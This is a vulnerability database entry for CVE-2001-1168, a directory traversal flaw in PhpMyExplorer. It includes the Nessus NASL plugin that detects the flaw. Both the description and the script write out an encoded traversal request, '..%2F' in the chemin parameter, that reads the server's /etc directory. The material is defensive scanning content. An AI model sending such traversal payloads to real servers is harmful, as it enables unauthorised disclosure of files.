Vulnerabilities > CVE-2001-1168 - Unspecified vulnerability in PHPmyexplorer Classic and PHPmyexplorer Multiuser

047910
CVSS 0.0 - NONE
Attack vector
UNKNOWN
Attack complexity
UNKNOWN
Privileges required
UNKNOWN
Confidentiality impact
UNKNOWN
Integrity impact
UNKNOWN
Availability impact
UNKNOWN

Summary

Directory traversal vulnerability in index.php in PhpMyExplorer before 1.2.1 allows remote attackers to read arbitrary files via a ..%2F (modified dot dot) in the chemin parameter.

Nessus

NASL familyCGI abuses
NASL idPHPMYEXPLORER.NASL
descriptionphpMyExplorer is vulnerable to a directory traversal attack that allows anyone to make the remote web server read and display arbitrary directories. For example: GET /index.php?chemin=..%2F..%2F..%2F..%2F%2Fetc will return the contents of the remote /etc directory.
last seen2020-06-01
modified2020-06-02
plugin id10750
published2001-09-07
reporterThis script is Copyright (C) 2001-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/10750
titlePhpMyExplorer index.php chemin Parameter Encoded Traversal Arbitrary File Access
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");

if(description)
{
 script_id(10750);
 script_version ("1.27");
 script_cve_id("CVE-2001-1168");
 script_bugtraq_id(3266);
 	
 script_name(english:"PhpMyExplorer index.php chemin Parameter Encoded Traversal Arbitrary File Access");
 
 script_set_attribute(attribute:"synopsis", value:
"Arbitrary directories may be browsed on the remote server." );
 script_set_attribute(attribute:"description", value:
"phpMyExplorer is vulnerable to a directory traversal attack that allows
anyone to make the remote web server read and display arbitrary
directories.

For example:
    GET /index.php?chemin=..%2F..%2F..%2F..%2F%2Fetc
will return the contents of the remote /etc directory." );
 script_set_attribute(attribute:"solution", value:
"Contact your vendor for the latest software release." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
 script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"false");

 script_set_attribute(attribute:"plugin_publication_date", value: "2001/09/07");
 script_set_attribute(attribute:"vuln_publication_date", value: "2001/08/29");
 script_cvs_date("Date: 2018/07/24 18:56:10");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe",value:"cpe:/a:phpmyexplorer:phpmyexplorer_classic");
script_end_attributes();

 script_summary(english:"phpMyExplorer dir traversal");
 script_category(ACT_GATHER_INFO);
 script_copyright(english:"This script is Copyright (C) 2001-2018 Tenable Network Security, Inc.");
 script_family(english:"CGI abuses");
 script_dependencie("webmirror.nasl", "http_version.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 script_require_keys("www/PHP");
 exit(0);
}

#
# The script code starts here
#
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:80);

if(!can_host_php(port:port))exit(0);


foreach dir (cgi_dirs())
{
  u = string(dir, "/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc");
  r = http_send_recv3(method:"GET", item:u, port:port);
  if (isnull(r)) exit(0);
  buf = strcat(r[0], r[1], '\r\n', r[2]);
  if ("resolv.conf" >< buf)
    security_warning(port, extra: strcat(
'\nThe following URL will exhibit the flaw :\n\n', build_url(port: port, qs: u), '\n'));
}